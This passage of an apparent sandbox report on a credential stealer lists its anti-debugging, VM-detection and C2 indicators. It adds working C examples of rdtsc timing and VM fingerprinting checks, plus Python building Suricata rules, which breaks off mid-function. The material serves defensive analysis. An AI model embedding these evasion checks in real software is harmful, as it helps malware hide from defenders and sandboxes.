                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 513094A second address: 5130970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F2A2C61915Dh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2A2C61915Dh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5130970 second address: 51309D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 7DE2h 0x00000007 pushfd 0x00000008 jmp 00007F2A2CEBE363h 0x0000000d add cx, E6DEh 0x00000012 jmp 00007F2A2CEBE369h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d jmp 00007F2A2CEBE35Eh 0x00000022 xchg eax, esi 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F2A2CEBE367h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 51309D7 second address: 51309DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 51309DD second address: 51309E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 51309E1 second address: 51309F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2A2C61915Dh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 51309F9 second address: 5130A1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE361h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A2CEBE35Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5130A1E second address: 5130A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5130A24 second address: 5130AB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE363h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+0Ch] 0x0000000e pushad 0x0000000f movzx eax, di 0x00000012 pushfd 0x00000013 jmp 00007F2A2CEBE361h 0x00000018 xor ecx, 5033AA96h 0x0000001e jmp 00007F2A2CEBE361h 0x00000023 popfd 0x00000024 popad 0x00000025 test esi, esi 0x00000027 jmp 00007F2A2CEBE35Eh 0x0000002c je 00007F2A9D7DBC8Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F2A2CEBE35Dh 0x0000003b sbb ax, 7EA6h 0x00000040 jmp 00007F2A2CEBE361h 0x00000045 popfd 0x00000046 mov bx, ax 0x00000049 popad 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5130B41 second address: 5130B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5130B88 second address: 5130BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A2CEBE35Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5130BB5 second address: 5130BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5130BBB second address: 5130BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5130BBF second address: 5130BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
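                The traces above are consecutive rdtsc reads separated by junk the protector emits between them (pushad/popad, pushfd/jmp/sbb/popfd sequences, and push eax/push edx ... pop edx/pop eax pairs that carry the first edx:eax reading across the junk). The elapsed cycle count between two reads is compared against a threshold, and the conditional branches to distant targets (such as jg 00007F2A9D7FC46Bh in the second trace) are the likely exits to the detected path. Together with the Oreans.vxd and Software\WinLicense strings listed further down in this section, this is consistent with a WinLicense/Themida style protector layer around the stealer rather than code of the stealer itself. The C program below is an added example, not code from the sample or from the report, that implements the same check on real hardware: two counter reads around a short busy sequence, the minimum over several probes so that ordinary interrupts do not inflate the result, and a threshold compare. The threshold, the probe count and the busy loop are assumptions chosen for illustration; it uses __rdtsc on x86 (GCC, Clang or MSVC) and falls back to a monotonic clock on other architectures.

```c
/*
 * Added example, not the sample's code: an rdtsc-based instrumentation check
 * of the kind the "RDTSC instruction interceptor" events above record.
 * Build: gcc -O2 rdtsc_check.c -o rdtsc_check
 */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#if defined(_MSC_VER)
#include <intrin.h>                 /* MSVC: __rdtsc() */
static uint64_t read_counter(void) { return __rdtsc(); }
#elif defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>              /* GCC/Clang on x86: __rdtsc() */
static uint64_t read_counter(void) { return __rdtsc(); }
#else
#include <time.h>
/* Non-x86 fallback (assumption: monotonic nanoseconds stand in for TSC cycles). */
static uint64_t read_counter(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

/* One probe: two counter reads around a short, deterministic busy sequence,
 * mirroring the "rdtsc ... junk ... rdtsc" pattern in the trace. The volatile
 * sink keeps the compiler from deleting the work between the reads. */
static uint64_t probe_delta(void) {
    volatile uint32_t sink = 0;
    uint64_t t0 = read_counter();
    for (int i = 0; i < 16; i++) sink += (uint32_t)i * 0x9E3779B1u;
    uint64_t t1 = read_counter();
    return t1 - t0;
}

/* Smallest delta among n samples. Taking the minimum filters out context
 * switches and interrupts, which inflate individual samples even on bare metal. */
uint64_t min_delta_of(const uint64_t *samples, size_t n) {
    uint64_t best = samples[0];
    for (size_t i = 1; i < n; i++)
        if (samples[i] < best) best = samples[i];
    return best;
}

/* Collect up to 64 probes and return the minimum delta. */
uint64_t measure_min_delta(size_t n_probes) {
    uint64_t samples[64];
    if (n_probes == 0) n_probes = 1;
    if (n_probes > 64) n_probes = 64;
    for (size_t i = 0; i < n_probes; i++) samples[i] = probe_delta();
    return min_delta_of(samples, n_probes);
}

/* The decision as a protector makes it: a delta above the threshold means
 * single-stepping, per-instruction interception or emulation. The threshold
 * (assumed here: 5000 cycles) is the weak spot: too low and a hypervisor that
 * traps rdtsc or a slow host trips it, which is exactly the compare an analyst
 * patches when unpacking. */
int looks_instrumented(uint64_t min_delta, uint64_t threshold_cycles) {
    return min_delta > threshold_cycles;
}

int main(void) {
    uint64_t d = measure_min_delta(32);
    printf("minimum delta over 32 probes: %llu\n", (unsigned long long)d);
    printf("verdict: %s\n", looks_instrumented(d, 5000) ? "instrumented or emulated" : "clean");
    return 0;
}
```

                Run it natively, then under a debugger while single-stepping through probe_delta, and compare the reported minimum: on bare metal and on hypervisors that pass the TSC through, the delta is a few hundred cycles, while per-instruction interception raises it by orders of magnitude. For sandbox operators the mitigation follows directly: do not trap rdtsc, or offset the TSC so the guest-visible delta stays small.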
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Special instruction interceptor: First address: DBED18 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Special instruction interceptor: First address: DC57E4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Special instruction interceptor: First address: E47644 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe TID: 7476 | Thread sleep time: -52026s >= -30000s
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe TID: 7588 | Thread sleep time: -210000s >= -30000s
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe TID: 7448 | Thread sleep time: -38019s >= -30000s
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe TID: 7588 | Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: pPizCGDvrx.exe, 00000000.00000002.1755665488.0000000000D9D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696492231s
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: pPizCGDvrx.exe, pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756296489.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754892767.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657962576.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755223714.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1603193401.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756183164.0000000001129000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754892767.0000000001127000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1603110801.0000000001158000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: pPizCGDvrx.exe, 00000000.00000003.1483744618.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696492231p
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696492231f
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000002.1755665488.0000000000D9D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Process information queried: ProcessInformation
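                The registry values, the Win32_BIOS query and the HARDWARE\ACPI\DSDT\VBOX__ string above are the classic firmware fingerprint: SystemBiosVersion and VideoBiosVersion carry the BIOS vendor strings, DriverDesc of the first display adapter names the (often virtual) graphics card, and the VBOX__ ACPI key exists only under VirtualBox. Two caveats before treating every hit in this block as a VM check. The long run of "VMware20,11696492231" strings sits in the same heap region as harvested password-manager entries (Interactive Brokers, Canara, Office 365 and so on), and "VMware20,1" is the SMBIOS product name of a recent VMware virtual machine, so these most likely show the sandbox's own hardware identity inside the stealer's collection buffer rather than hard-coded detection strings. "Hyper-V RAW" is the Winsock provider name for AF_HYPERV sockets and shows up in any Windows 10 process that enumerates Winsock protocols, so on its own it is not evidence of a Hyper-V check either. The program below is an added example, not the sample's code or part of the report: it collects the same kind of strings (the listed registry values on Windows; as an assumed stand-in on Linux, the SMBIOS fields under /sys/class/dmi/id) and classifies them with a substring table. The marker table is illustrative and not a copy of any protector's list.

```c
/*
 * Added example, not the sample's code: VM fingerprinting from firmware and
 * driver strings, the logic behind the registry / WMI queries listed above.
 * Build: gcc -O2 vm_fingerprint.c -o vm_fingerprint   (Windows: add -ladvapi32)
 */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>
#ifdef _WIN32
#ifndef _WIN32_WINNT
#define _WIN32_WINNT 0x0600         /* RegGetValueA needs Vista or later */
#endif
#include <windows.h>
#endif

/* Upper-case substrings the classic checks look for and the platform each
 * one indicates. Assumption: an illustrative table, not any protector's list.
 * "Hyper-V" deliberately keys on the SMBIOS product "Virtual Machine", not on
 * the noisy "Hyper-V RAW" Winsock string. */
static const struct { const char *needle; const char *platform; } VM_MARKERS[] = {
    { "VMWARE",          "VMware"     }, /* SMBIOS product "VMware20,1", VMware SVGA adapter */
    { "VBOX",            "VirtualBox" }, /* ACPI OEM id VBOX__, "VBOX" in SystemBiosVersion */
    { "VIRTUALBOX",      "VirtualBox" },
    { "VIRTUAL MACHINE", "Hyper-V"    }, /* Microsoft Corporation / Virtual Machine */
    { "QEMU",            "QEMU/KVM"   },
    { "BOCHS",           "Bochs"      },
    { "XEN",             "Xen"        },
    { "PARALLELS",       "Parallels"  },
};

/* Case-insensitive substring search; needle must already be upper-case. */
static int ci_contains(const char *haystack, const char *needle) {
    size_t n = strlen(needle);
    for (const char *p = haystack; *p; p++) {
        size_t i = 0;
        while (i < n && p[i] && toupper((unsigned char)p[i]) == needle[i]) i++;
        if (i == n) return 1;
    }
    return 0;
}

/* Platform a single firmware/driver string betrays, or NULL if none. */
const char *classify_vendor_string(const char *s) {
    if (!s) return NULL;
    for (size_t i = 0; i < sizeof VM_MARKERS / sizeof VM_MARKERS[0]; i++)
        if (ci_contains(s, VM_MARKERS[i].needle)) return VM_MARKERS[i].platform;
    return NULL;
}

/* Gather the same kind of strings the sample queries; returns how many were read. */
static size_t collect_platform_strings(char out[][128], size_t max) {
    size_t n = 0;
#ifdef _WIN32
    /* The registry values from the report. SystemBiosVersion and
     * VideoBiosVersion are REG_MULTI_SZ; the first entry is enough to match. */
    const struct { const char *key; const char *value; } regs[] = {
        { "HARDWARE\\DESCRIPTION\\System", "SystemBiosVersion" },
        { "HARDWARE\\DESCRIPTION\\System", "VideoBiosVersion"  },
        { "SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0000", "DriverDesc" },
    };
    for (size_t i = 0; i < 3 && n < max; i++) {
        DWORD cb = sizeof out[n];
        if (RegGetValueA(HKEY_LOCAL_MACHINE, regs[i].key, regs[i].value,
                         RRF_RT_ANY, NULL, out[n], &cb) == ERROR_SUCCESS) {
            out[n][sizeof out[n] - 1] = '\0';
            n++;
        }
    }
    /* HARDWARE\ACPI\DSDT\VBOX__ only exists under VirtualBox. */
    HKEY h;
    if (n < max && RegOpenKeyExA(HKEY_LOCAL_MACHINE, "HARDWARE\\ACPI\\DSDT\\VBOX__",
                                 0, KEY_READ, &h) == ERROR_SUCCESS) {
        RegCloseKey(h);
        strcpy(out[n++], "VBOX__");
    }
#else
    /* Assumed stand-in: Linux exposes the SMBIOS fields behind Win32_BIOS via sysfs. */
    const char *files[] = { "/sys/class/dmi/id/sys_vendor",  "/sys/class/dmi/id/product_name",
                            "/sys/class/dmi/id/bios_vendor", "/sys/class/dmi/id/bios_version",
                            "/sys/class/dmi/id/board_vendor" };
    for (size_t i = 0; i < 5 && n < max; i++) {
        FILE *f = fopen(files[i], "r");
        if (!f) continue;
        if (fgets(out[n], sizeof out[n], f)) { out[n][strcspn(out[n], "\n")] = '\0'; n++; }
        fclose(f);
    }
#endif
    return n;
}

/* Verdict: the first platform any collected string maps to, "none" if nothing
 * matched, "unavailable" if no string could be read (for example, no DMI access). */
const char *detect_vm(void) {
    char strings[8][128];
    size_t n = collect_platform_strings(strings, 8);
    if (n == 0) return "unavailable";
    for (size_t i = 0; i < n; i++) {
        const char *p = classify_vendor_string(strings[i]);
        if (p) return p;
    }
    return "none";
}

int main(void) {
    printf("platform verdict: %s\n", detect_vm());
    return 0;
}
```

                Running this on the analysis VM shows what the sample saw; for sandbox hardening, the values it reads (BIOS and video BIOS version strings, the display adapter description, the VBOX__ ACPI key) are exactly the ones to rewrite to vendor-neutral content, while the WMI Win32_BIOS route returns the same SMBIOS data and has to be patched at the SMBIOS table rather than in the registry.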

                Anti Debugging

                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | File opened: SICE
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: rapeflowwj.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crosshuaht.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: sustainskelet.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: aspecteirs.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: energyaffai.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacebudi.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: discokeyus.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: grannyejh.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: sweepyribs.lat
                Source: pPizCGDvrx.exe, 00000000.00000002.1755665488.0000000000D9D000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ~vProgram Manager
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: pPizCGDvrx.exe, 00000000.00000003.1671204983.00000000011ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iles%\Windows Defender\MsMpeng.exe
                Source: pPizCGDvrx.exe, pPizCGDvrx.exe, 00000000.00000002.1756573900.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756296489.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755109523.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657908110.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754892767.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657962576.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755223714.0000000001158000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
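The nine .lat domains listed in this section are the C2 candidates Joe Sandbox recovered from the unpacked memory region. The Python below is added here as an example and is not part of the Joe Sandbox report: it turns that domain list into Suricata dns.query rules and runs the same match over eve.json DNS events. The domain list is copied from the report; SID_BASE, the rule text, the helper names and the SAMPLE_EVE events are the editor's assumptions and constructed input.

```python
"""Build Suricata DNS rules from the C2 domains listed in the report and
check eve.json DNS events against them.

Added example, not part of the Joe Sandbox report.  The domain list is
copied from the report; SID_BASE, the rule text and SAMPLE_EVE are the
editor's assumptions / constructed input.
"""
import json
import re

# C2 domains found in the unpacked region (copied from the report).
C2_DOMAINS = [
    "rapeflowwj.lat", "crosshuaht.lat", "sustainskelet.lat", "aspecteirs.lat",
    "energyaffai.lat", "necklacebudi.lat", "discokeyus.lat", "grannyejh.lat",
    "sweepyribs.lat",
]

SID_BASE = 9_100_000  # assumed free local SID range; adjust for your ruleset


def suricata_dns_rules(domains, sid_base=SID_BASE):
    """One rule per domain on the dns.query sticky buffer.

    'endswith' makes the content a suffix match; the pcre anchors it to a
    label boundary so 'notsweepyribs.lat' does not fire for 'sweepyribs.lat'
    while 'cdn.sweepyribs.lat' still does.
    """
    rules = []
    for i, d in enumerate(sorted(set(domains))):
        rules.append(
            "alert dns any any -> any any ("
            f'msg:"LummaC C2 DNS query {d}"; dns.query; content:"{d}"; nocase; endswith; '
            f'pcre:"/(^|\\.){re.escape(d)}$/i"; '
            f"classtype:trojan-activity; sid:{sid_base + i}; rev:1;)"
        )
    return rules


def domain_matches(qname, domains=C2_DOMAINS):
    """Return the C2 domain that qname equals or is a subdomain of, else None."""
    q = qname.rstrip(".").lower()
    for d in domains:
        if q == d or q.endswith("." + d):
            return d
    return None


def scan_eve_dns(lines, domains=C2_DOMAINS):
    """Return (timestamp, src_ip, queried name, matched C2 domain) for each
    DNS *query* event in Suricata eve.json lines that hits the list."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        dns = ev.get("dns", {})
        if ev.get("event_type") != "dns" or dns.get("type") != "query":
            continue
        matched = domain_matches(dns["rrname"], domains)
        if matched:
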